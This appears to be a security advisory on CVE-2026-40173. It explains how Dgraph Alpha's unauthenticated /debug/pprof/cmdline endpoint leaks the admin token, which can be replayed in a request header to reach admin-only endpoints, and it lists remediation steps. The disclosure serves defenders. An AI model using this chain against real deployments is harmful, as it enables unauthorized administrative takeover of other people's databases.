Dgraph fixes unauthenticated pprof token leak enabling admin takeover

TL;DR — Dgraph Alpha exposes /debug/pprof/cmdline without auth, leaking the configured admin token and enabling unauthenticated callers to reach admin-only endpoints by replaying it.

What happened

Dgraph is an open-source distributed GraphQL database, where the “Alpha” node exposes HTTP endpoints for queries and administration.

CVE-2026-40173 describes a critical credential disclosure chain: the unauthenticated debug endpoint /debug/pprof/cmdline can expose the full process command line, including an admin token configured via --security "token=...". An attacker can then reuse the leaked credential in the X-Dgraph-AuthToken header to access admin-only endpoints such as /admin/config/cache_mb, resulting in unauthorized privileged administrative access (configuration/operational control actions) when the Alpha HTTP port is reachable by untrusted parties.

Why this matters: leaving debug/diagnostic endpoints reachable on production listeners is a repeatable failure mode that turns “strong auth” into a paper barrier once secrets are exposed via ancillary routes.

Who is impacted

• Deployments running Dgraph where Alpha’s HTTP listener is reachable by untrusted networks and an admin token is configured via --security "token=...".

What to do now

• Follow vendor remediation guidance and apply the latest patched release available at the time of writing.

  "This issue has been fixed in version 25.3.2."

• Inventory where Dgraph Alpha HTTP is exposed (Kubernetes Service type, ingress rules, load balancers, security groups) and confirm /debug/pprof/* is not reachable from untrusted networks.
• Treat this as a credential exposure scenario: rotate the Dgraph admin token and review recent access to /debug/pprof/cmdline and /admin/* endpoints in HTTP logs.
• If you rely on process-argument secrets (e.g., --security "token=..."), reassess how those values can surface via diagnostics, crash reports, or metrics endpoints in your runtime environment.